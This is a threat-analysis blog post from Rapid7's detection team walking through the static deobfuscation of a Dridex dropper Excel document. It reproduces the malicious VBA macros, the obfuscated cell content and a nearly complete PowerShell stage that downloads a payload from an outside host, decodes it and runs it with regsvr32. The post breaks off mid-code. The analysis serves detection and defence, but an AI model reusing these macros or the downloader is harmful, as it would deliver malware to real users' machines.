Uncooking Eggs: Manual Dridex Dropper Malicious Document Deobfuscation Methods

Rapid7’s Managed Detection and Response (MDR) services team leverages specialized toolsets, malware analysis, tradecraft, and collaboration with Rapid7’s Threat Intelligence researchers to detect and remediate threats.

Recently, we identified increased use of a type of malicious document that leverages ActiveX buttons, embedded VBA macros that modify cell contents, and white fonts to hide obfuscated code that downloads, decodes, and executes a sample associated with the Dridex family of malware using regsvr32.

The first step in analyzing any potentially malicious sample is to open the document in a controlled environment, execute it, and observe its behavior. This process is commonly called “basic dynamic analysis.”

Basic dynamic analysis can reveal the behavioral characteristics of a sample and provide insight into a sample’s capabilities. However, one downside of basic dynamic analysis is that, while one can observe that an event occurred, one can miss the reason why it happened.

Basic static analysis has many benefits, especially when the nature of a malicious document is unknown. Arbitrarily detonating samples can alert malicious actors that a sample has been opened, allows for the fingerprinting of a defender’s sandbox technologies, and allows for the creation of block lists from command and control servers.

Statically analyzing malicious document code to better understand how a malicious document achieves its goal(s) allows for the creation of signatures and alerting, and can therefore improve time to detection and remediation for an organization.

In this blog post, we will analyze an obfuscated malicious document with a focus on basic static analysis.

MalDoc Analysis

Today’s blog will investigate the following suspicious document:

Malicious document sample:
MD5: DE2B9C76F2714B136FBA35B0F5814E0A
SHA1: A4B003322D338EF1B5B48DDB702340A1ABEF7D63
SHA256: 15D3EDCF37B1E4D03A5C61C1C7752130A9899B978C94F80D8DABC45F416FC253

To begin with malicious document analysis, our MDR team often detonates samples using open-source automated malware analysis sandbox tools. These tools help to gain insight into the behaviors of the sample in question.

In this instance, the behavior that Rapid7 identified in a customer environment was not present in the automated detonation. This is an indication that the malicious document sample requires user interaction or has anti-analysis functionality.

Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Function text(k, kk, aA As Integer)
Dim s(): Dim u As Integer
x = Cells(k, kk)
For ci = 1 To Len(x)
    ReDim Preserve s(ci)
    s(ci) = Mid(x, ci, 1)
Next
textx = ""
For u = 0 To aA Step 4
textx = textx + s(u)
Next u
text = textx
End Function
Public Function Sdf(sCmd As String) As String


    Dim oh As Object
    Set oh = CreateObject("WScript.Shell")

    Dim co As Object
    Dim vre As Object
    Set co = oh.Exec(sCmd)
    Set vre = co.StdOut

    Dim s As String
    Dim sLine As String
    While Not vre.AtEndOfStream
        sLine = vre.ReadLine
        If sLine <> "" Then s = s & sLine & vbCrLf
    Wend

    Sdf = s

End Function
Function vess()
Debug.Print "" & "\n" & Sdf(text(200, 10, 13748)) '& vbCrLf
End Function

While Rapid7 found that this macro declares three functions—text, Sdf, and vess—there is no call to these functions within this macro code, which is common. Sometimes, malware authors include functions that are never called to create a time sink for analysts. Therefore, we need to determine if and how this code is called before we continue to analyze it.

Rapid7 also discovered this macro:

Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub i_Layout()
ThisWorkbook.vess
End Sub

Private Sub Preview_Click()
ThisWorkbook.vess
End Sub

This macro shows the calls to the ThisWorkbook.vess function, which is expected.

Typically, malicious macros will have AutoExec functionality, which means the malicious code is executed as soon as macros are enabled. We can infer that these macros would not successfully execute in some sandbox environments due to the need for user interaction. We can also infer that the author included them as a method of inhibiting automated analysis.

So, how are the necessary subprocedures i_Layout() or Preview_Click() called to launch the malicious functions?

We can see that the lure image is called i. The function i_Layout() would be launched if a user resizes the image named i (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/layout-event).

We can also see that the ActiveX control button is called Preview, and so the function Preview_Click()
(https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/click-event) is launched if a user clicks the Preview button.

So now we know that if a user resizes the lure image or clicks the Preview button, the associated subprocedure is called. Both subprocedures call the function ThisWorkbook.vess(). Function vess contains a debug print statement and nested function calls. (See Line 38.)The innermost function call is text(200, 10, 13748).

If we look at the text() function, we can see that it uses the Worksheet.Cells Excel property (https://docs.microsoft.com/en-us/office/vba/api/excel.worksheet.cells). With the first and second parameters passed to the text function, this will return the contents of the cells 200,1 to 200,10.

It attempts to loop through the cell contents using the Len() function (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/len-function), or the length of those cells, and saves the values into an array using the functions ReDim() and Mid() (ReDim() function, Mid() function). It then loops through the array and concatenates every fourth character into a return string.

If we open the document and look at the referenced cells, we would see that they are empty except for the last cell, which contains a large string hidden with white font.

An Rinvuoicne, Da bLillL, a3nd 2a r ece iptS – HtheEse LareL pr3oba2bly. alDl dLocuLmen,ts Syouh’vee helardl abEoutx buet ycou _migRht unotn beD awLareL of  th"e sPubtole WdifEferRencSes Hthaet mLakel th"em  exa ctl y w"hat$ thhey =are(. SGo, elett’s -takPe ar loook cat eeacsh osne  so -youI cadn b e c$leapr aiboudt w)hat. doMcumaentis tno rWefeir tno wdheno yowu nHeeda ton andd llearen t;he $dififeroencse b=etw[eenR anu innvoitce,i a mbilel a.nd Ia rnecetipte. Hraveo a plooSk aet orur vinvioicce deefisnit.ionH beaforne rdeadlinge thRis eartficl]e i;f y$ou hneewd t=o lNearen wwhat- isO anb injvoiece cbeftore  re$adiing othiss.  Def(ini1tio,ns $Invhoic)e A;n i$nvoiice= isN ane itwemi-zedO libst jof eprocductts  sol$d oir soervsice(s p2rov,ide0d, )alo;ng (wit(h t[he ramoeuntf ofl moeneyc owted iforo eanch .linae istems, aend mtheb toltaly am]oun:t o:f mLoneoy oawedd. AWn iinvoticeh isP seant rfrotm tihe abilllerN toa thme celie(nt,\ in" hoWpesi ofn bedingo pawid switBhina a sceretai\n a"mou)nt )of .timGe. eBiltl AT biyll pis esom(eth\ing" yoMu, Sas .a cWustiomenr m3ust2 pa.y. UA bnills isa anf inevoiNce ain tthait ivt heas Mthee ittemihzedo lidst sof \pro"duc)ts )sol:d o:r sServeicets pWroviidend, daloong wwitPh tohe samo(unt$ ofh mowney, ow$ed ifor, ea0ch ,ite0m, ,and1 a 0tot0al ,amo1unt0 ow0ed., Ho1wev6er,5 wh1en 2you) re;cei(ve (an \inv"oic{e, 1you8 wo}uld{ en2ter1 it} as{ a 4bil1l t}hat{ yo3u o0we.} In{ ot4her8 wo}rds{, a5n i1nvo}ice{ is2 se0nt,} an{d a4 bi9ll }is {rec2eiv6ed.} Re{cei1pt 0A r}ece{ipt3 is3 di}ffe{ren1t f6rom} an{ in8voi}ce {in 1tha7t a}n i{nvo4ice5 is} re{que3sti}ng {pay3men7t f}or {pro1duc3ts }or {ser2vic5es }rec{eiv1ed,9 wh}ere{as 4a r0ece}ipt{ is4 pr4oof} th{at 5the} se{rvi3ces9 or} pr{odu4cts3 ha}ve {alr3ead6y b}een{ pa1id 2for}. A{n i1nvo1ice} co{mes4 be}for{e t3he 5pay}men{t h3as 1bee}n m{ade2, w9hil}e a{ re2cei8pt }com{es 9aft}er {the3 pa2yme}nt {has4 be7en }mad{e. 2Dif7fer}enc{es 3So,8 if} yo{u a7re }a v{end2or,4 yo}u w{oul2d s}end{ an1 in4voi}ce {aft6er }a s{erv0ice} ha{s b1een} co{mpl4ete6d a}nd {mon1ey 5is }owe{d, 5and2 th}en {you5 wo0uld} se{nd 3a r4ece}ipt{ af5ter3 yo}u r{ece2ive3 th}e p{aym2ent2 fr}om {the4 in2voi}ce.\ On" th-e ofthe r h'andi, ilf y3ou gareZ a 5cus'tom,er,' thpe iinvonicef yotu r0ecebiveU ish yopur ubilDl, jands th/en zyouT wiRll rrec3eivZe ag reuceispt honcNe yBou zpayR yozur qbil'l. ,Inv'oic4e iXs shentx - nCusbtom3er Grecjeivaes 8it 'as ,a b'ill2 - zPayhmen3t iGs mKades - yRecEeip3t Tshe 4impvortYanche okf aOn i/nvoNiceu anLd aq biMll Lis +thaqt iMt dLocupmen+ts AtheQ setrviKcesR cohmpl+eteYd afnd/gor 2proKduc7ts WsolPd, valovng JtheA wifth hthe7 amiounxt oqwedM. TLhe +venqdorM anLd t8he 1cusDtomqer McanL us+e tqhe MinvLoicTe fHor /boo7kkeFepiZng 0purgposzes.G ThUe iXmpofrtaXncej ofv a Krecceipot iZs tWhatj itr se3rveds aCs dDocu'men,tat'ionW thfat itheH prdoduBctsb anWd/o'r s,erv'iceis hNas 8beeQn plaidw foQr a3nd qtheM buLsin+essq trMansLact5ionI is' co,mpl'ete6. Tkhe Dven5dorJ anyd tihe qcusMtomLer +canq usMe tLhe MrecTeip+t aAs pcrooEf tdhatL thqe aCmouDnt 5owemd huas 9beecn pmaidZ. P3leaJse knotze tXhatE thterep arXe stevehral/ dibffeTrenZt tbypeAs odf i7nvowice3s, reacnh fHor 2difKferLentR tyLpesn ofq sesrvihcesT, p9rodkuctbs, Yand7 patymeLnt sagrmeemMentss moade4 be2tweaen Fthe0 veTndoVr a'nd ,his' clKien't. ,If 'youK ar8e hnandgwri1tinkg yFourU re/ceilpts8, ykou 7canC spKeed1 upd thne pwrocIessx byk inPves+tinkg idn c1arbeon NcopBy pgape2r. MThiTs wbillB prcovi7de gtwoF co1pie5s oef tzhe Xrecveiput: xonew foWr tehe mven9dor1 andd otne Ffork thOe cqustMomeLr. +Alsqo, MmakLe s+ure9 yoAu ugse qverMy dLark+ inqk fMor LhanOdwrEittFen MrecReip7ts.S MaNke ksurpe eoachv recceiopt Jyouc crOeatae, Aor OrecNeivUe, Tinculudves 6venqdorM anLd v+endqee MdetLailhs, Kpro'duc,t o'r sNervGice9 deqtai/ls,D thae dDateK ofA th4e t7ranosacutiosn, NtheJ am0oun7t oPf tZhe rtraJnsaCctidon,R thie mGethhod Yof YpayWmenct, EandB siLgnagtur4es Mfroqm tMhe Lven+dorq anMd tLhe WcliWentW. IAf yEou 2havAe tmo csreaFte 'sev,era'l dkiff0ereAnt 5recZeipVts eas La pIart6 ofP yoeur 2busAineTss,8 yoTu c2an Yalwwaysv crfeatGe a4 cuYsto9miz+ed RtemLplahte,0 orY thAere+ ar8e saevenralG frdee VrecHeipIt tiempmlat'es ,you' caqn dMownLloaOd oxnliUne.d Havvinmg ap te3mplLatem wiwll cspered Gup LtheG prmocekss,r anVd iMt wzill8 enPsurse aEll 6of UyouCr r6ecemiptGs lqookM unLifo+rm qandM prLofe'ssi,ona'l. IOnc/e yEou xgetn thYe hbang1 of+ itV, iTnvoqiceMs, Lbil+ls,' an,d r'eceriptIs wgillM bePcomIe sNeco7nd ynatGure1 tod yo6u; landM thVey 9wilwl hSelp4 kegep 9you0r bZusi'nes,s f'inaQnce's i,n l'ine6 andd oOrgaRnizied.N SoUmetKimegs pXeopjle 8get7 a AquoVte 1conDfus3ed Zwitah awn iAnvoxiceG, byut 5theQ tr4uthV isJ, t9hesee agre mtwoz veSry NdifpferNent+ thRingbs w3henj yoju’rWe t8alkEingq mo0neyE anpd bKusiSnesqs. MSo,L le+t’sq taMke La lJook7 atJ eaEch uonej toR geFt tdo kQnow7 thTem qa lMittLle +betqterM, aLnd 5leaArn xhowI thBey Uareu usOed jpro'per,ly.' Ifh yo4u hdaveEn’tX doBne dso EalrHeadQy, myouK shwoulPd r0eadh ouQr iCnvo9iceu deefin6iti+on 8befEoreC reoadibng 5thiWs a2rtibcleu. QVuotje  iA qnuotae i8s ae foorma8l evstiHmat8e tnhat' sh,ows' th+e pProdyuctRs onr sberv9iceFs npeedbed,l anyd tHhe 'dol,lar' am oun&t f(or  thoJse bprowducEts nor Vser:vicCes.O A mquoSte PcanE be' ve,rba'l omr wfritLtenB, iFt m/ay ior Pmayy nomt ble trhe Cexa2ct /samEe ass txhe uendB prPoduTct,P inE tevrmsJ ofr preodumctsT, slerv'ice,s, 'andd thGe daollnar tamoruntS owsed.X A Squoete AletAs yTou Qkno6w hEow kmucxh ymou swilql olwe qforh thEe puroj4ectQed MworDk ohr soervbicej, aZnd +it 9ins+ure3s yGou 6wilJl omnlya owze t6hatQ amKounLt, fand7 no9t sOomev a 'num,ber' thCat [is 4com,ple2tel4y r,and2om.5  O]n t-he JvenOdori sinde qof MthiLngsq, aM quLote) do(esn ’t (cha(ngeq thMe iLnve&nto ry,( as( thGe wEorkt ha-sn’vt baeenr coImplAeteBd yLet.e On ce wan Ginvioic*e fMor Dthe' pr,odu'ct nis csenOt, qtheMn tLhe +invqentMoryL nudmbeirs qcanM chLang+e aqccoMrdiLnglNy. G A ]quo:te :is Aoftsen Cvaliid Ifor  30) da ys }fro m t)he .timre iet waas DissTuedO, aend Na qduot(e c)an qbe MreaLdju)ste-d braseEd oPn tlhe acliCentE’s (nee[ds.C Fohr eAxamrple], y1ou 1may9 ge+t q[uotCes hfroAm sreve]ral7 di1ffe+ren[t aCdvehrtiAsinrg a]gen1cie0s a5s y)ou ,are[ loCokihng Ato rhav]e y3our9 we bsi te -redcesirgneed. PTheln, AyouC fiend  out( yo[u aCctuhallAy nreed] a 1web2sit1e r+ede[sigCn, has Awelrl a]s a7 co2mpl+ete[ coCntehnt Arehraul], s8o y7ou )ask, fo[r nCew hquoAtesr fr]om 1the2 ag4enc ies- barsedE onP thle naew CamoEunt( of[ woCrk hyouA nered.] In8voi3ce + On[ thCe ohtheAr hrand], a8n i7nvo+ice[ isC a hdetAailred ]lis8t o6f p)rod,uct[s tChath haAve ralr]ead3y b6een) so'ld ,or 'sersvicses IthaOt hqaveM alLrea+dy qbeeMn cLompnletmed.O AsdideE fr]om :the: lidst,e thCe ionvoMiceP alRso EincsludSes )datqes Mas Lto +wheqn tMhe Lpro ducyts HwerWe s%old{ orN thee sWerv-iceos wBerej coemplCetetd,  alo ng IwitOh t.he sdoltlarR amEounAt oMwedr foEr eAachd liene rite(m, SandW thVe t_ota,l a[mouSnt Ythast its oewedm fr.om tthee cuXstoTmer.. Wehen' yo,u’r'e lFookzing7 foJr wEorkI to' be, co'mplhetezd oqr pMrodLuct+s tqo pMurcLhasKe, Za qPuotce wFoulFd ciomel fixrstR, tlhenK thGe jVob 8wou0ld xbe ucomsple2tedp, a8nd Gan EinvPoicEe wxoulfd fnollBow.V Afster+ thee a4mouHnt Qon Gtheb inHvoiMce ris 8paiCd, Da rheceJiptr woguldQ coxmplwetem th'e b,usi'nesBs tWranisacwtioGn. PProOfor4ma Ninvioic/e  KYouZ ma4y haavem heSard+ ofe a lprorforNma hinvGoicde, Zas hit fis Fver7y sximi6larU toW a 8quoLte nandv ann in8voi0ce.U A vproVforOma cinv+oicCe l/ookLs v'ery, si'milHar Nto Ean binvnoicPe, eexcWeptP itg wirll Hcleqarlry s/tat8e t8hatl itK isx a VproVfortma BinvGoicOe. PIf NyouY arqe iMn aLn i+nduqstrMy tLhat1 inAvolBvesr shmippFingC anEd dFelimverYy fqor MproLduc+ts,q thMe pLrof/ormxa iLnvoBicee alAso yneeXds ito LincXludqe eDverRy d+etaail vsurHrouhndi1ng ithaCt pIroc7esss, iEnclpudiIng Mthe' ty,pe 'of cpacVkag7ing2, tRhe NcouQntrxy tDhe TgooAds MareG coIminIg fMromI anHd tYhe 'cou,ntr'y w6herde tYheyL wiqll Mbe Ldel+iveqredM, aLnd fanyh adHdit7ionual efrezighvt dIetaxilsy.  dThi1s pFrofQormca dNocusmen9t i's u,sua'llyi thwe kGickista)rt  to (a bNusienesWs n-egootiaBtiojn, eas Cit twil l lSisty thSe pTrodeuctms o.r siervOice.s rCequoestmed,p anrd tehe samosunti thOat nwil.l bde oewedf afltera thte seervsiceTs aRre 'com,ple'tedO an2d/orr p+rodNuctfs aHre jsolrd. nA q'uot,e c'an cout8linTe tVhe Lsamke t1hinWgs,J alfthoiughf geHnerSallqy tMhe Lfor+matq ofM a LquoGte his SmorVe lgikeW a pletfter4, aBnd ma pmrofRormVa ijnvo1iceq loAoks1 exCactkly klikNe arn iQnvodiceg.  GOncie aG prLofosrmam inVvoiGce mis csenut tzo tChe tpotJentHialK cl'ien,t, 'thapt pmersTon 3cann thCen +makoe aq deqcisMionL if+ thqey MwanLt tio gSo tmhro4ughJ wieth itheG trpans0actjion1 bacsedX onN thWe i6nfohrmaGtiomn tUheyI sece, Qor wtheYy cean acom3e bzack/ wipth 7a nsegohtia1tiosn tho cxhankge RtheU scvopeV ofY wonrk,' or, as'k f or [a dSiffYeresnt TpriEce,M an.d tIhe Ocon.verCsatOionm copntirnueEs fsrom' th,ere'.  mAndV th/erex yoPu hOaves itx: tahe DdifqferMencLe b+etwqeenM a Lquojte,M a qproMforLma +invqoicMe, Landq anh inmvoiOce.y IfY yoMu’rve lvooklingC fo2r mBore9 insfor5matzionF ab1outD diAffe9ren2t twypeQs obf iMnvoiicems, CcheYck LoutR ouBr irnvonice2 tyRpesM cormpaqriskon 5pagye.Aj tylpicual 9inveoicce o1fteCn hxas htheY woerd yInvkoicae pRlacbed 7at 4theQ toep oTf tkhe 1doclumennt,3 an+d s5ervFes Ras 7thes dotcumPentC’s jtit4le.V InyvoiVce rRefCereqnceL  BjeloIw tkhe wtitXle,y inOcluIde za nIumb0er Ffort thqe iMnvoLice+. EqachM anLd eoverQy iWnvoBiceB yoNu ckrea0te aandI sesnd zshoAuldv inmcluOde da nHumbaer,G an6d iEt sIhouVld ibe gdifGferZentb foJr ebach8 inqvoiMce.L Ty+picqallMy, Lthej nuQmbeDrs CforY eaQch Ginv5oicre woillc beX inL chWronkolojgicjal hordYer Mso Dyoui anRd yiourx clHienKt c0an qkee6p tgracgk oRf w8hicCh i5nvoLiceFs cNomePs fkirsHt. m Foor e1xamWplei, tvhe Over/y f+irstt iSnvoOicey yoQu sQendS soLmeoXne bmayA haNve gtheC nuFmbeJr 0n001H, tKhen' th,e n'ext2 wiZll 1be g000v2, 'and, so' foqrthM. TLhe +numqberMs mLake7 anH eaXsy irefLere/nceJ poZintO, ams wnells, iIf aqn i+nvoXiceP gelts FlosKt ign tehe ZmaiXl, Xor 0doeusn’St glet Bpaind feor Csomke r+easkon.v  Lxist5 ofF itXemsL  TFhe cnexrt twhinqg yXou’gll Hwangt tZo i6nclwudeA ine yozur IinvUoicze iMs aT deataiFledA liast cor 1a duescMripktioXn otf t7he 8prozducQts AsolNd avnd/zor btheu sebrvivces' pr,ovi'dedB. Tthisu lilst 0inf7ormRs ymou,p asq weMll Las +youqr cMlieLnt,p exdact6ly rwha+t t0heyX arUe paayi2ng QforF.  wWitmhine thOe i3temZizeDd lpistQ, yFou pwilQl whant5 ton inVcluXde StheS dahte Ethek seCrvijces9 wewre 0proBvidxed candq/or9 prToduActsj puMrchAaseod, aaloQng wwitkh tIhe NdatNe t6he ginv7oicZe w3as +senmt. 0Inc'lud,e a'll Bof Mthe3 coSntamct pinfEormuatison eforM thVe bjuyeFr, Kas 4welkl aRs fRor vthe7 se0lle'r. , Na'turVallDy, yyout shBoulDd ibnclmude/ a abreWakdFownM ofP alNl tjhe rcos2ts.o Ea2ch ClinPe iqteme shqoulMd hLave+ a qcosMt aLssoeciaztedn wiqth Rit,u evPen 4if kit Dis 4.00u, omr eCvenc ifq eaMch Lite+m cqostMs tLhe 1samie aYmouFnt.L ToAtalBs aDnd Bpay6menZt iSnfoJrmamtio/n  iIf TtheKre 2wasC anby aymou2ntsr paAid Ttow/ardV th2e iUtem0ize3d lGistD be8forue t8he Iinvloicye w2as /sengt, 1incpludOe tfhe iamoFuntk pa/id Yas Iit qwilMl aLffe+ct qtheM grLandP toLtalC owled.d Ifr th/ereU ar7e aOny 0taxees Eor xfee1s afssoUciaotedz wipth cthe8 seqrvi1cesY orH pr2odu2ctst, iwnclqudeM thLat +as qwelMl. LAt Cthee enWd o3f t4he 9lisEt, qincMludLe t+he qtotMal LamoIunt3 ow/ed.v  I+f tFherNe ayre Nany6 spHeciWal gpay7men't d,eta'ilsr, a*dd wthoGse,i su)ch .as qyouMr PLayP+al qaccMounLt innfoArmamtioen, [or 3oth,er 1pay1men,t i2nst]ruc-tioJns.o Ifi thnerew isG a 'due, da'te )for  th'e p,aym'ent+ (u'sua,lly' ith’s 730 oday2s),/ inycluKde 3thadt, Zandt an8y iinfofrma2tioEn a6bou5t lmate4 fe5es,b ifZ nePcesGsarxy.Ayn iynvomicet, aM biall,q anMd aL re+ceiqpt M– tLhesNe aere 'pro,bab'ly vallC doscumHentqs y8ou’Jve qheaMrd Labo+ut qbutM yoLu mmighyt nSot pbe 'awa,re 'of MtheL su+btlqe dMiffLeregncems tXhat8 maTke 'the,m e'xacytlyw whYat ztheXy aEre.F So+, lKet’ws tYakeB a alooMk aqt eMachL on+e sqo yMou Lcanb beN clxearN abyoutx wh7at kdocYumeHnts9 tof rebferE toJ wh'en ,you' neeed ato Mand( le arnq thMe dLiff+ereqnceM beLtwe[en ian Oinv.oicme, ea bmillo anrd ay reSceiTpt.R HaEve aa lMook] at[ ouCr ionvoNicev deEfinRitiTon ]bef:ore: reFadiRng Othims abrtiAcles if' yo,u n'eed0 tou leTarnn whYat Ois kan EinvYoicme b6efoCre 7rea3din8g tDhisq. DMefiLnit+ionqs IMnvoLiceU Anx inHvoilce fis 2an oite7mizEed 9lislt ohf pIrodwuct1s sDolde orH seArviXcesy prooviZdedx, aXlonsg wnithJ th2e asmouLnt 2of Cmon'ey ,owe'd f0or +eacIh lTines itNem,a anSd tWhe Htottal pamoUunt2 ofr mo7neyL owPed.9 Anl inqvoiQce Nis asenAt fsromf th6e beillEer Cto vthe4 clBienyt, rin ohoptes Dof +beiWng /pai6d wLithYin Oa ciert/ainR am8oun=t owf tGimei. B ill) A  bil,l i's s,ome'thiEng 6you4, ass aT curstoImern mugst qpayM. AL bi+ll qis Man Linv(oic e iwn tGhati itZ haVs tZhe riteUmiz6ed NlisYt oEf pProd0uctrs sGoldc orp sedrviwcess prZovigded', a,lon'g w8ithh thUe aLmouOnt Cof rmonhey zoweod fEor 8eacWh iotemf, afnd 9a t+otaul aWmou5nt goweWd. YHowWeveNr, /wheVn yFou arecReivme aBn isnvoyiceh, yXou iwou1ld QentKer Rit tas Ta bHillC th4at Lyout owme. bIn Noth2er 'wor,ds,' ans inivoiOce Nis .senCt, oandm a Pbilrl iEs r'ece)ive)d. .RecReipEt Ap reLceiapt Cis Edif(fer'entq frMom Lan 'inv,oic[e isn tthatR ani inNvoiGce ]is [reqcuesHtinAg pRaym]ent3 fo9r p)rod.uctRs oEr spervLiceas rCeceEive(d, 'wheJreabs aw re'cei,pt 'is $pro'of )tha t t|he  ser.vic es (or (proVducAts RhavIe aalreBadyl beeen  pai'd f*or.m AnD inRvoi*ce 'com)es .befnoreA thMe peaym[ent3 ha,s b1een1 ma,de,2 wh]ile- a JrecoeipIt cNome's a'fte)r  "

Using the following CyberChef recipe, we can Base64-decode and inflate the stream to simulate what PowerShell would do:

This results in the following:

${SdfjI`EUY`ID}=("{0}{1}"-f'm/d','ot');${L`X`D`XCijuIAswe}=([System.Security.Principal.WindowsIdentity]::("{0}{2}{3}{1}" -f 'G','ent','e','tCurr').Invoke())."Us`Er"."V`ALuE";${sf`j`HeIY6E}=("{0}{1}{2}{3}" -f 'h','ttps://t','ure','n')+${s`df`jiEUyid}.("{0}{1}" -f 'spl','it').Invoke('/')[1]+'.co'+${sdfJI`EUY`Id}+'?'+${LxD`x`CI`JUia`swe};&('Si') ("{0}{2}{1}" -f'Var','f','iable:/') ${s`FJH`eiY6E};&('Sv') 1 ("{3}{0}{1}{2}" -f 'ie','n','t','Net.WebCl');&('SI') ("{2}{1}{0}" -f':C2','able','Vari') (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') ("{1}{0}{2}" -f 'loa','Down','dData');${yu`UH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."in`V`oKE"((.('Va'+'ria'+'ble') ('f'))."v`AluE"))-Join'');${xc`C`hi}=${Env`:T`emP};${kiI`U`jjk}=(${D}=.('g'+'ci') ${XC`cHI}|&('ge'+'t-r'+'andom'))."Na`mE" -replace ".{4}$";${Xii`XI}=${x`c`ChI}+'\'+${KI`iuJJk}+'.';${m`U`RrU}=${Y`UuH}.("{0}{1}" -f 'sub','string').Invoke(0,1);${p}=[int]${M`URrU}*100;${ccN`Um} =${Y`UUH}.("{0}{1}{2}" -f 'r','e','move').Invoke(0,1);${DK`j`Kifxo}=${CcN`UM} -split'!';.('s'+'al') ("{1}{0}"-f'ms','Dru') ("{1}{2}{0}"-f 'r32','re','gsv');${E`QDRU`mS}=[Text.Encoding]::"u`Tf8";function e`xi`TtT(${a`Bc}){${W`WUFD`EFK`DJh`NkX}=[Convert]::("{1}{3}{2}{0}"-f'ng','FromBa','i','se64Str').Invoke(${a`BC});return ${WW`U`FDefK`dJ`hNkx}};foreach(${Fff`J`DFJIiO`U`FIdH`jFD} in ${Dkjki`F`XO}[0]){${t`k`cJ`kXNkz`xmDs}=@();${HH`kDjS`KF`JI`kSsR}=${M`U`RRu}.("{0}{2}{1}{3}"-f 'ToCh','Arr','ar','ay').Invoke();${F`FFj`d`F`jIIOu`F`IdhjfD}=.('Exi'+'tTT')(${FFFJd`FJ`i`IOuFi`DhJ`Fd});for(${kI`Jg`JG}=0; ${k`IJG`Jg} -lt ${Ff`Fj`dfJIiOU`FId`hj`FD}."CoU`Nt"; ${K`Ijg`jG}++){${TK`c`JKXn`KZXmdS} += [char]([Byte]${F`Ffj`D`FjIIOUFI`dhJfD}[${Kij`GjG}] -bxor[Byte]${hhKdJs`kFj`iKsSr}[${KIJg`JG}%${HH`K`D`jskfjIKS`sr}."C`ount"])}};${qK`di`UJsD`Ih`Fs}=${c`C`Num}."REPl`AcE"((${D`k`jKiFxO}[0]+"!"),${Eq`dR`UmS}."gEtSTRI`Ng"(${tKcjKxnk`Z`x`MDs}));[io.file]::("{1}{2}{3}{0}"-f'es','Wri','teA','llByt').Invoke(${xii`Xi},(.('Exi'+'tTT')(${QKdIU`J`S`DIHFs} -replace ".{200}$")));if((.('g'+'ci') ${x`ii`xi})."lENG`Th" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${x`i`iXI};.('slee'+'p') 15;[io.file]::"Wr`IteALL`lIn`eS"(${XI`ixI},[regex]::("{0}{1}{2}"-f 'repl','a','ce').Invoke(${lx`DXcij`U`iA`sWE},'\d',''))

This payload is peppered with backticks, which are an escape sequence in PowerShell, and only interpreted within double-quotes.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_special_characters?view=powershell-7

Let’s remove them:

string = r"""${SdfjI`EUY`ID}=("{0}{1}"-f'm/d','ot');${L`X`D`XCijuIAswe}=([System.Security.Principal.WindowsIdentity]::("{0}{2}{3}{1}" -f 'G','ent','e','tCurr').Invoke())."Us`Er"."V`ALuE";${sf`j`HeIY6E}=("{0}{1}{2}{3}" -f 'h','ttps://t','ure','n')+${s`df`jiEUyid}.("{0}{1}" -f 'spl','it').Invoke('/')[1]+'.co'+${sdfJI`EUY`Id}+'?'+${LxD`x`CI`JUia`swe};&('Si') ("{0}{2}{1}" -f'Var','f','iable:/') ${s`FJH`eiY6E};&('Sv') 1 ("{3}{0}{1}{2}" -f 'ie','n','t','Net.WebCl');&('SI') ("{2}{1}{0}" -f':C2','able','Vari') (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') ("{1}{0}{2}" -f 'loa','Down','dData');${yu`UH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."in`V`oKE"((.('Va'+'ria'+'ble') ('f'))."v`AluE"))-Join'');${xc`C`hi}=${Env`:T`emP};${kiI`U`jjk}=(${D}=.('g'+'ci') ${XC`cHI}|&('ge'+'t-r'+'andom'))."Na`mE" -replace ".{4}$";${Xii`XI}=${x`c`ChI}+'\'+${KI`iuJJk}+'.';${m`U`RrU}=${Y`UuH}.("{0}{1}" -f 'sub','string').Invoke(0,1);${p}=[int]${M`URrU}*100;${ccN`Um} =${Y`UUH}.("{0}{1}{2}" -f 'r','e','move').Invoke(0,1);${DK`j`Kifxo}=${CcN`UM} -split'!';.('s'+'al') ("{1}{0}"-f'ms','Dru') ("{1}{2}{0}"-f 'r32','re','gsv');${E`QDRU`mS}=[Text.Encoding]::"u`Tf8";function e`xi`TtT(${a`Bc}){${W`WUFD`EFK`DJh`NkX}=[Convert]::("{1}{3}{2}{0}"-f'ng','FromBa','i','se64Str').Invoke(${a`BC});return ${WW`U`FDefK`dJ`hNkx}};foreach(${Fff`J`DFJIiO`U`FIdH`jFD} in ${Dkjki`F`XO}[0]){${t`k`cJ`kXNkz`xmDs}=@();${HH`kDjS`KF`JI`kSsR}=${M`U`RRu}.("{0}{2}{1}{3}"-f 'ToCh','Arr','ar','ay').Invoke();${F`FFj`d`F`jIIOu`F`IdhjfD}=.('Exi'+'tTT')(${FFFJd`FJ`i`IOuFi`DhJ`Fd});for(${kI`Jg`JG}=0; ${k`IJG`Jg} -lt ${Ff`Fj`dfJIiOU`FId`hj`FD}."CoU`Nt"; ${K`Ijg`jG}++){${TK`c`JKXn`KZXmdS} += [char]([Byte]${F`Ffj`D`FjIIOUFI`dhJfD}[${Kij`GjG}] -bxor[Byte]${hhKdJs`kFj`iKsSr}[${KIJg`JG}%${HH`K`D`jskfjIKS`sr}."C`ount"])}};${qK`di`UJsD`Ih`Fs}=${c`C`Num}."REPl`AcE"((${D`k`jKiFxO}[0]+"!"),${Eq`dR`UmS}."gEtSTRI`Ng"(${tKcjKxnk`Z`x`MDs}));[io.file]::("{1}{2}{3}{0}"-f'es','Wri','teA','llByt').Invoke(${xii`Xi},(.('Exi'+'tTT')(${QKdIU`J`S`DIHFs} -replace ".{200}$")));if((.('g'+'ci') ${x`ii`xi})."lENG`Th" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${x`i`iXI};.('slee'+'p') 15;[io.file]::"Wr`IteALL`lIn`eS"(${XI`ixI},[regex]::("{0}{1}{2}"-f 